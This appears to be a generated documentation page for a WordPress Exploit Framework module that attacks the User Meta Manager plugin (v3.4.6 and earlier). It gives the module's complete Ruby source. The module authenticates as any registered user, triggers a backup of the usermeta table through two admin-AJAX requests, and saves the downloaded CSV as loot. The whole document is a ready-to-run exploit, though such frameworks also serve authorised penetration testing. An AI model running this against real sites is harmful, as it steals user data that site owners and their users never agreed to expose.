class Wpxf::Auxiliary::UserMetaManagerInformationDisclosure
Public Class Methods
new()
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 9
# Sets up the module: runs the superclass initializer, records the module
# metadata (name, description, credits, references, disclosure date) and
# registers the two required credential options.
def initialize
  super

  credits = [
    'Panagiotis Vagenas', # Disclosure
    'rastating'           # WPXF module
  ]
  advisories = [
    ['WPVDB', '8384'],
    ['URL', 'http://seclists.org/bugtraq/2016/Feb/48']
  ]

  update_info(
    name: 'User Meta Manager <= 3.4.6 Information Disclosure',
    desc: %( The User Meta Manager plugin up to and including v3.4.6, suffers from an information disclosure vulnerability. Any registered user can perform a series of AJAX requests, in order to get all the contents of the `usermeta` table. ),
    author: credits,
    references: advisories,
    date: 'Feb 01 2016'
  )

  # Per the description above, the issue is reachable by any registered
  # user, so the module needs credentials for an account on the target site.
  login_option = StringOption.new(
    name: 'username',
    desc: 'The WordPress username to authenticate with',
    required: true
  )
  secret_option = StringOption.new(
    name: 'password',
    desc: 'The WordPress password to authenticate with',
    required: true
  )

  register_options([login_option, secret_option])
end
Public Instance Methods
backup_table(cookie)
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 57
# Sends a GET request to the admin AJAX URL with the `umm_switch_action`
# action and the `umm_backup` sub-action, using the supplied session cookie.
#
# @param cookie the session cookie passed through to the request
# @return the value returned by execute_get_request
def backup_table(cookie)
  query = {
    'action' => 'umm_switch_action',
    'umm_sub_action' => 'umm_backup'
  }

  execute_get_request(url: wordpress_url_admin_ajax, cookie: cookie, params: query)
end
check()
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 53
# Delegates the version check to check_plugin_version_from_readme for the
# `user-meta-manager` plugin.
#
# NOTE(review): '3.4.7' is presumably the first fixed release, since the
# module name lists <= 3.4.6 as affected; confirm against the helper's contract.
#
# @return the value returned by check_plugin_version_from_readme
def check
  plugin_slug = 'user-meta-manager'
  fixed_version = '3.4.7'

  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
download_backup(cookie)
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 68
# Sends a GET request to the admin AJAX URL with the `umm_switch_action`
# action and the `umm_get_csv` sub-action, using the supplied session cookie.
#
# @param cookie the session cookie passed through to the request
# @return the value returned by execute_get_request
def download_backup(cookie)
  query = {
    'action' => 'umm_switch_action',
    'umm_sub_action' => 'umm_get_csv'
  }

  execute_get_request(url: wordpress_url_admin_ajax, cookie: cookie, params: query)
end
password()
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 49
# Reads the `password` entry from the module datastore.
#
# @return the stored value of the `password` option
def password
  configured_password = datastore['password']
  configured_password
end
run()
Calls superclass method
Wpxf::Module#run
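# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 79
# Runs the module: authenticates with the configured credentials, sends the
# backup request, downloads the resulting CSV and stores it as loot.
#
# Both HTTP responses are validated before anything is written to disk.
# Previously a missing or timed-out response raised NoMethodError on
# `res.body`, and an error page from a site that is not affected was saved
# and reported as a successful download, which gives a false positive in an
# assessment.
#
# The loot file is a copy of the target's `usermeta` table, so it should be
# stored and shared as sensitive data.
#
# @return [Boolean] true when the backup was downloaded and logged, false
#   when the superclass run, the authentication or either request failed
def run
  return false unless super

  cookie = authenticate_with_wordpress(username, password)
  return false unless cookie

  emit_info 'Creating table backup...'
  res = backup_table(cookie)
  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  emit_info 'Downloading table backup...'
  res = download_backup(cookie)
  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  # Only a successful response is treated as a backup file; anything else
  # is reported instead of being saved as loot.
  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  loot = export_and_log_loot res.body, 'Backup of the usermeta table', 'backup', '.csv'
  emit_success "Downloaded backup to #{loot.path}"
  true
end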
username()
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 45
# Reads the `username` entry from the module datastore.
#
# @return the stored value of the `username` option
def username
  configured_username = datastore['username']
  configured_username
end